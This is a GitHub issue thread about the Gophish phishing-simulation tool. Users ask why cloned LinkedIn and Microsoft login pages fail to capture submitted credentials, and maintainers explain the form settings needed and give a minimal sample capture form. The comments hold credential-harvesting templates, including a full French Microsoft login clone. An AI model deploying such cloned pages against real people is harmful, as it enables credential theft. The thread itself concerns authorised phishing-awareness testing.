### ISSUE TITLE
cant capture submitted data on a form - gopgish

### ISSUE THREAD

**Issue by dordor89** [gophish/gophish#1705]
Hi,

Im trying to lunch a campaign with gophish, 
for test reasons only i have decided to take "linked in".

when i have created the landing page i press the button "capture submitted data" and "  capture password".

when i lunch the campaign i cant see the submitted data in the results, only that the user indeed press the button.

Im pretty share  its related to the form it self but i cant found the problem.

as you said :
1. all input fields have names 
2. the method is POST
3. there the submit button, but i cant find anything related to that.

im pasting here the code which i copied of the form itself only 

```html
<form action="" class="login__form" method="post" name="form" novalidate=""><input name="__original_url" type="hidden" value="https://www.linkedin.com/login/checkpoint/lg/login-submit" /><input name="csrfToken" type="hidden" value="ajax:7081667718708683324" /><code id="login_form_validation_error_username" style="display: none;"><!--"Please enter a valid username"--></code><code id="consumer_login__text_plain__invalid_username" style="display: none;"><!--"Hmm, we don't recognize that email. Please try again."--></code><code id="consumer_login__text_plain__large_username" style="display: none;"><!--"Email or phone number must be between 3 to 128 characters"--></code><code id="consumer_login__text_plain__invalid_username_with_phone_v2" style="display: none;"><!--"Hmm, we don’t recognize that phone number. Please try again"--></code><code id="consumer_login__text_plain__no_username" style="display: none;"><!--"Please enter an email address or phone number"--></code>

<div class="form__input--floating"><input aria-describedby="error-for-username" aria-label="Email or Phone" autofocus="" id="username" name="session_key" required="" type="text" validation="email|tel" /><label aria-hidden="true" class="form__label--floating" for="username">Email or Phone</label>

<div aria-live="assertive" class="form__label--error  hidden" error-for="username" id="error-for-username" role="alert">&nbsp;</div>
</div>
<code id="domainSuggestion" style="display: none;"><!--false--></code><input name="ac" type="hidden" value="0" /><input name="sIdString" type="hidden" value="ec81e796-ba50-4484-a905-0c3c68638088" /><input name="parentPageKey" type="hidden" value="d_checkpoint_lg_consumerLogin" /><input name="pageInstance" type="hidden" value="urn:li:page:d_checkpoint_lg_consumerLogin;ufELSTplSG+tBT96iHD6tQ==" /><input name="trk" type="hidden" value="" /><input name="authUUID" type="hidden" value="" /><input name="session_redirect" type="hidden" value="" /><input name="loginCsrfParam" type="hidden" value="b1939fbd-09a1-477a-8cc3-4a4c493758d1" /><input id="fp_data_login" name="fp_data" type="hidden" value="default" /><input name="_d" type="hidden" value="d" /><code id="i18nShow" style="display: none;"><!--"Show"--></code><code id="i18nHide" style="display: none;"><!--"Hide"--></code><input name="controlId" type="hidden" value="d_checkpoint_lg_consumerLogin-login_submit_button" /><code id="consumer_login__text_plain__empty_password" style="display: none;"><!--"Please enter a password."--></code><code id="consumer_login__text_plain__small_password" style="display: none;"><!--"The password you provided must have at least 6 characters."--></code><code id="consumer_login__text_plain__large_password" style="display: none;"><!--"The password you provided must have at most 400 characters."--></code><code id="consumer_login__text_plain__wrong_password" style="display: none;"><!--"Hmm, that's not the right password. Please try again "--></code><code id="consumer_login__text_plain__large_password_200_chars" style="display: none;"><!--"The password you provided must have at most 200 characters."--></code><code id="lix_checkpoint_request_evaluate_password" style="display: none;"><!--"enabled"--></code>

<div class="form__input--floating"><input aria-describedby="error-for-password" aria-label="Password" id="password" name="password" required="" type="password" validation="password" /><label aria-hidden="true" class="form__label--floating" for="password">Password</label>

<div aria-live="assertive" class="form__label--error  hidden" error-for="password" id="error-for-password" role="alert">&nbsp;</div>
<span class="button__password-visibility" id="password-visibility-toggle" role="button" tabindex="0">Show</span></div>

<div class="login__form_action_container "><button aria-label="Sign in" class="btn__primary--large from__button--floating" type="submit">Sign in</button></div>
</form>
```

hope to here from you,
and thanks in advanced.

by the way im using 0.7.1 version

**Comment by glennzw** [comment]
You'll need to paste the actual source code from the landing page, please.

Here's a sample landing page that captures the password:

```
<html>
<head>
	<title></title>
</head>
<body>
<form action="" method="post" name="form"><label>Username:</label> <input name="username" type="text" /><br />
<label>Password:</label> <input name="password" type="password" /><br />
<input id="login" name="login" type="submit" value="Login" />&nbsp;</form>
</body>
</html>
```

Also, make sure the 'Capture Passwords' option is selected.

**Comment by jordan-wright** [comment]
@glennzw's suggestion is spot on. You typically need three things when making a form which will collect credentials:

* Setting the `action=""`
* Setting the `method="POST"`
* Making sure the `input` elements have a `name` attribute.

Beyond that, you'll need to remove any Javascript which could be intercepting form submission. In your case, it looks like Javascript may be the culprit.

As another note, I recommend against using specific brands since it could hurt the user's trust in them. Instead, you can make simple modifications such as "Sign into your account", and removing the logo. You will almost certainly see the same results in terms of click through rates, and you will avoid potentially infringing on their brand. You can find other tips on #1057.

I hope this helps! Since @glennzw provided a working example you can build from, I'm going to go ahead and close this one out.

**Comment by edermi** [comment]
I also had issues with GoPhish not capturing credentials. As far as I can recall, it had to do with the way the form was submitted. The goal was to submit credentials asynchronously and therefore JavaScript's FormData type was used. As the name suggests, data serialized from this object is multipart/formdata and GoPhish seems unable to parse this.

Not sure if this is related though.

**Comment by dordor89** [comment]
thank you guys,
you helped me a lot!!

Jordan - got your tip about the brands, thanks!!

**Comment by Julien-Champemont** [comment]
Hello I have a problem, Gopish does not read the values entered in my code, here is my code : 

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="shortcut icon" href="https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico">
    <title>Connectez-vous à votre compte</title>
    <style>
        * {
            padding: 0;
            margin: 0;
            box-sizing: border-box;
            font-family: "Segoe UI", "Helvetica Neue", "Lucida Grande", "Roboto", "Ebrima", "Nirmala UI", "Gadugi", "Segoe Xbox Symbol", "Segoe UI Symbol", "Meiryo UI", "Khmer UI", "Tunga", "Lao UI", "Raavi", "Iskoola Pota", "Latha", "Leelawadee", "Microsoft YaHei UI", "Microsoft JhengHei UI", "Malgun Gothic", "Estrangelo Edessa", "Microsoft Himalaya", "Microsoft New Tai Lue", "Microsoft PhagsPa", "Microsoft Tai Le", "Microsoft Yi Baiti", "Mongolian Baiti", "MV Boli", "Myanmar Text", "Cambria Math";
        }

        html,
        body {
            background: linear-gradient(150deg, #EADDD9, #D9DCE5, #DEE3DA, #EBE8D8);
            color: #1b1b1b;
        }

        section{
            display:table-cell;
            vertical-align:middle;
            height: 100vh;
            width: 100rem;
            max-width: 100%;
        }
        

        .title {
            line-height: 1.75rem;
            color: #1b1b1b;
            font-size: 1.5rem;
            font-weight: 600;
        }

        .auth-wrapper {
            max-width: 440px;
            width: calc(100% - 40px);
            padding: 44px;
            margin: 0 auto;
            margin-bottom: 28px;
            margin-right: 450px;
            background-color: #fff;
            -webkit-box-shadow: 0 2px 6px rgba(0, 0, 0, .2);
            -moz-box-shadow: 0 2px 6px rgba(0, 0, 0, .2);
            box-shadow: 0 2px 6px rgba(0, 0, 0, .2);
            min-width: 320px;
            /* min-height: 338px; */
            /* overflow: hidden;
            position: absolute;
            transform: translate(-50%, -50%);
            top: 50%;
            left: 50%; */
        }

        .opts {
            padding: 10px 44px;
            max-width: 440px;
            cursor: pointer;
            margin: 0 auto;
            margin-right: 450px;
            background-color: #fff;
            -webkit-box-shadow: 0 2px 6px rgba(0, 0, 0, .2);
            -moz-box-shadow: 0 2px 6px rgba(0, 0, 0, .2);
            box-shadow: 0 2px 6px rgba(0, 0, 0, .2);
        }

        .opts:hover {
            background-color: rgba(0, 0, 0, .1);
        }

        .input {
            padding: 4px 8px;
            border-style: solid;
            border-width: 2px;
            border-color: rgba(0, 0, 0, .4);
            background-color: rgba(255, 255, 255, .4);
            height: 32px;
            height: 2rem;
            padding: 6px 10px;
            padding-left: 10px;
            border-width: 1px;
            border-top-width: 1px;
            border-right-width: 1px;
            border-left-width: 1px;
            border-color: #666;
            border-color: rgba(0, 0, 0, .6);
            height: 36px;
            outline: none;
            border-radius: 0;
            -webkit-border-radius: 0;
            background-color: transparent;
            border-top-width: 0;
            border-left-width: 0;
            border-right-width: 0;
            padding-left: 0;
            width: calc(100% - 20px);
        }

        .input:hover {
            border-color: #323232;
            border-color: rgba(0, 0, 0, .8);
        }

        .input::placeholder {
            font-size: 15px;
        }

        .mb-0 {
            margin-bottom: 0;
        }

        a.link {
            text-decoration: none;
            color: #0067b8
        }

        a:hover {
            text-decoration: underline !important;
            color: #666;
        }

        a:focus {
            border: 1px dotted #000;
            text-decoration: underline !important;
        }

        .btn-test {
            text-align: right;
        }

        .btn1 {
            margin: 0 0 0 auto;
            display: inline-block;
            background-color: #0067b8;
            color: #fff;
            border: 2px solid #0067b8;
            padding: 5px 30px;
            font-size: 15px;
            cursor: pointer;
        }

        .btn1:hover {
            background-color: #005da6;
        }

        .btn2 {
            margin: 0 0 0 auto;
            display: inline-block;
            background-color: rgba(0, 0, 0, 0.2);
            color: black;
            border: 2px solid transparent;
            padding: 5px 30px;
            font-size: 15px;
            cursor: pointer;
        }

        .btn2:hover {
            background-color: rgba(0, 0, 0, 0.426);
        }

        .has-icon {
            display: flex;
            gap: 5px;
            align-items: center;
        }

        .mb-16 {
            margin-bottom: 16px;
        }

        .has-icon .icon {
            display: inline-flex;
        }

        .footer {
            position: absolute;
            left: 0;
            bottom: 0;
            width: 100%;
            overflow: visible;
            z-index: 99;
            clear: both;
            min-height: 28px;
            display: flex;
            flex-direction: row;
            gap: 10px;
            justify-content: end;
        }

        .footer a,
        .footer span {
            color: #000;
            font-size: 12px;
            line-height: 28px;
            margin-left: 8px;
            margin-right: 8px;
            text-decoration: none;
        }

        .footer span {
            font-size: 20px;
            line-height: 20px;
        }

        .footer a:hover {
            text-decoration: underline;
        }

        .d-none {
            display: none;
        }

        .back {
            border: none;
            border-radius: 50%;
            width: 24px;
            height: 24px;
            background-color: unset;
            cursor: pointer;
        }

        .identity {
            display: inline-flex;
            gap: 5px;
        }

        .d-block {
            display: block;
        }

        .w-100 {
            width: 100%;
        }

        .back:hover {
            background-color: #e6e6e6;
            background-color: rgba(0, 0, 0, .1);
        }

        .mt-16 {
            margin-top: 16px;
        }

        .mb-16 {
            margin-bottom: 16px;
        }

        .error {
            color: var(--error) !important;
        }

        .error-inp {
            border-bottom-color: var(--error) !important;
        }

        .btn-group {
            text-align: right;
            width: 100%;
            margin: 16px 0;
        }

        .btn-group>.btn {
            display: inline;
        }

        .btn-group>.btn:not(:last-child) {
            margin-right: 5px;
        }

        .btn-sec {
            background-color: #b2b2b2;
            color: #000;
            border-color: #b2b2b2;
        }

        .btn-sec:hover {
            background-color: rgba(0, 0, 0, .3);
        }

        #btn_final:hover {
            text-decoration: underline;
        }

        .text-title {
            font-size: 1.5rem;
        }

        label.has-checkbox {
            display: inline-flex;
            align-items: center;
            gap: 5px;
        }

        .checkbox {
            width: 20px;
            height: 20px;
        }

        .p {
            font-weight: 400;
            font-size: 15px;
            margin: 16px 0;
        }

        .fs-13 {
            font-size: 13px;
        }

        #user_identity {
            font-size: 15px;
            color: #1b1b1b;
        }

        img{
            vertical-align: middle;
        }

        @media screen and (max-width:500px) {
            html, body{
                background-color: #fff;
            }
            .auth-wrapper{
                box-shadow: none !important;
                /* margin:auto 80px; */
                padding: 24px !important;
                /* position: relative;
                transform: none; */
                /* top: 0;
                left: 0; */
                width: unset !important;
                max-width: unset !important;
                margin: 0 30px !important;
            }
            .opts{
                box-shadow: none !important;
                padding: 8px 24px !important;
                border: 1px solid #999;
                /* padding of 24px on both sides = 48px*/
                /* padding of 24px on authwrapper and margin of 30px  sides = 54px*/
                max-width: calc(100% - 112px);
                margin: 12% auto !important;
            }
        }
        :root {
            --error: #e81123;
        }
    </style>
</head>

<body>
    <section id="section_uname" class="container">
        <div class="auth-wrapper">
            <img class="logo" role="img" pngsrc="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ea19b2112f4dfd8e90b4505ef7dcb4f9.png" svgsrc="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg" data-bind="imgSrc, attr: { alt: str['MOBILE_STR_Footer_Microsoft'] }" src="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg" alt="Microsoft">
            <h2 class="title mb-16 mt-16">Se connecter</h2>
            <form name="form" action="" method="post" >
                <div class="mb-16">
                    <p id="error_uname" class="error"></p>
                    <input id="uname" type="text" name="username" class="input" placeholder="E-mail, telephone ou identifiant Skype" id="emailInput">
                </div>
            
            <div>
                <p class="mb-16 fs-13">Pas de compte ? <a href="https://signup.live.com/signup?sru=https%3a%2f%2flogin.live.com%2foauth20_authorize.srf%3flc%3d1036%26client_id%3d81feaced-5ddd-41e7-8bef-3e20a2689bb7%26mkt%3dFR-FR%26opid%3dDADC19739668BDFE%26opidt%3d1715093370%26uaid%3dd45c383020264d8a9d5f126ac790f8a4%26contextid%3d62220D7DB9BFF3E7%26opignore%3d1&mkt=FR-FR&uiflavor=web&lw=1&fl=easi2&client_id=81feaced-5ddd-41e7-8bef-3e20a2689bb7&uaid=d45c383020264d8a9d5f126ac790f8a4&suc=81feaced-5ddd-41e7-8bef-3e20a2689bb7&lic=1" class="link">Créez-en un !</a></p>
                <p class="mb-16 fs-13">
                    <a href="https://answers.microsoft.com/fr-fr/msoffice/forum/all/votre-compte-nest-pas-accessible/3ebd8edd-11a4-4887-bea8-527d607b0acf" class="link">Votre compte n'est pas accessible ?
                    </a>
                </p>
            </div>
            <div class="btn-test">
                <button class="btn2" id="btn_retour">Retour</button>
                <input type="submit" class="btn1" id="btn_next" value="Suivant">
            </div>
        </form>
        </div>
        <div class="opts">
            <img class="tile-img medium" role="presentation" data-bind="addEventHandlers, attr: { src: $data.darkIconUrl }" src="https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg" style="width: 32px;">
            <span class="key-icon-text">Options de connexion</span>  
        </div>
    </section>

    <section id="section_pwd" class="d-none">
        <div class="auth-wrapper">
            <img class="logo" role="img" pngsrc="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ea19b2112f4dfd8e90b4505ef7dcb4f9.png" svgsrc="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg" data-bind="imgSrc, attr: { alt: str['MOBILE_STR_Footer_Microsoft'] }" src="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg" alt="Microsoft" class="d-block">
            <div class="identity w-100 mt-16 mb-16">
                <button class="back">
                    <img src="https://raw.githubusercontent.com/Octagon-simon/microsoft-login-clone/main/assets/back.png" />
                </button>
                <span id="user_identity">a@b.com</span>
            </div>
            <h2 class="title mb-16">Entrez le mot de passe</h2>
            <form>
                <div class="mb-16">
                    <p id="error_pwd" class="error"></p>
                    <input  type="password" name="password" class="input" placeholder="Mot de passe"/>
                </div>
            </form>
            <div>
                <p class="mb-16"> <a href="#" class="link fs-13">Mot de passe oublié ?</a></p>
                <p class="mb-16">
                    <a href="#" id="other-methods-link" class="link fs-13">Autres méthodes pour se connecter</a>
                </p>
            </div>
            <div class="btn-test">
                <button class="btn1" id="btn_sig">Se connecter</button>
            </div>
        </div>
    </section>

    <section id="section_final" class="d-none">
        <div class="auth-wrapper">
            <img class="logo" role="img" pngsrc="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ea19b2112f4dfd8e90b4505ef7dcb4f9.png" svgsrc="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg" data-bind="imgSrc, attr: { alt: str['MOBILE_STR_Footer_Microsoft'] }" src="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg" alt="Microsoft" class="d-block">
            <div class="identity w-100 mt-16 mb-16">
                <span id="user_identity">a@b.com</span>
            </div>
            <h2 class="title mb-16">Rester connecté ?</h2>
            <p class="p">Restez connecté pour ne pas avoir à vous reconnecter la prochaine fois.</p>
            <label class="has-checkbox">
                <input type="checkbox" class="checkbox" />
                <span>Ne plus afficher ce message</span>
            </label>
            <form action="" method="post">
            <div class="btn-group">
                <button class="btn2" id="btn_non">Non</button>
                <button class="btn1" id="btn_oui">Oui</button>
              </div>
            </form>
        </div>
    </section>

    <footer class="footer">
        <a href="https://www.microsoft.com/fr-fr/legal/terms-of-use">Conditions d'utilisation</a>
        <a href="https://www.microsoft.com/fr-fr/trust-center/privacy">Confidentialité et cookies</a>
        <a href="https://support.microsoft.com/fr-fr/office/r%C3%A8gles-pour-le-v%C3%A9rificateur-d-accessibilit%C3%A9-651e08f2-0fc3-4e10-aaca-74b4a67101c1">Accessibilité : partiellement conforme</a>
        <span>.&nbsp;.&nbsp;.</span>
    </footer>
    <script>

        document.getElementById('btn_next').addEventListener('click', function(event) {
  event.preventDefault(); // Prevents the form from submitting

  var unameInp = document.getElementById('uname');
  var inputValue = unameInp.value;
  var emailRegex = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
  var phoneRegex = /^\d{10}$/; // Assuming a 10-digit phone number
 
  

  if (!emailRegex.test(inputValue) && !phoneRegex.test(inputValue)) {
    document.getElementById('error_uname').textContent = 'Veuillez saisir un e-mail, un numéro de téléphone ou un identifiant Skype valide.';
  } else {
    document.getElementById('error_uname').textContent = '';
    // Toggle the visibility of the first section
    document.getElementById("section_uname").classList.add('d-none');
    // Remove the 'd-none' class from the second section
    document.getElementById('section_pwd').classList.remove('d-none');
    // Update the text content of the element with the ID 'user_identity'
    document.querySelectorAll('#user_identity').forEach((e) => {
      e.innerText = inputValue;
    });
  }
});

document.getElementById('btn_sig').addEventListener('click', function(event) {
  event.preventDefault(); // Prevents the form from submitting

  // Hide the first and second sections
  document.getElementById("section_uname").classList.add('d-none');
  document.getElementById('section_pwd').classList.add('d-none');

  // Show the final section
  document.getElementById('section_final').classList.remove('d-none');
});
        
        const error = document.getElementById("error_uname");
const optionsButton = document.querySelector('.opts');

optionsButton.addEventListener('click', function() {
  error.textContent = "Votre organisation ne vous autorise pas à utiliser d'autres options de connexion.";
  error.style.display = "block";
});

document.getElementById('other-methods-link').addEventListener('click', function(event) {
  event.preventDefault();
  document.getElementById('error_pwd').textContent = "Votre organisation ne vous autorise pas à utiliser d'autres méthodes de connexion.";
});


const sig = document.getElementById('btn_sig');
let pwdVal = false; // Déclaration de la variable pwdVal

sig.addEventListener('click', () => {
    //validate the form
    validate();
    if (pwdVal) {
        document.getElementById("section_pwd").classList.toggle('d-none');
        document.getElementById('section_final').classList.remove('d-none');
        view = "final";
    }
})
        function validate() {
            
            function unameValAction(type) {
                if (!type) {
                    document.getElementById('error_uname').innerText = unReq;
                    unameInp.classList.toggle('error-inp');
                    unameVal = false;
                } else {
                    document.getElementById('error_uname').innerText = "";
                    unameInp.classList.remove('error-inp')
                    unameVal = true;
                }

            }
            function pwdValAction(type) {
                if (!type) {
                    document.getElementById('error_pwd').innerText = pwdReq;
                    pwdInp.classList.toggle('error-inp')
                    pwdVal = false;
                } else {
                    document.getElementById('error_pwd').innerText = "";
                    pwdInp.classList.remove('error-inp')
                    pwdVal = true;
                }

            }
        }
        const button = document.querySelector(".btn2");

button.addEventListener("click", () => {
  history.back();
  location.reload();
});



        //back button
        document.querySelector('.back').addEventListener('click', () => {
            view = "uname";
            document.getElementById("section_pwd").classList.toggle('d-none');
            document.getElementById('section_uname').classList.remove('d-none');
        })

        // Fonction pour activer le bouton "Suivant" lorsqu'on appuie sur Entrée
document.addEventListener("keypress", function(event) {
    // Vérifier si la touche appuyée est "Entrée" (code 13)
    if (event.keyCode === 13) {
        event.preventDefault(); // Empêcher le comportement par défaut (comme soumettre un formulaire)
        document.getElementById("btn_next").click(); // Cliquer sur le bouton "Suivant"
    }
});
    </script>
</body>

</html>
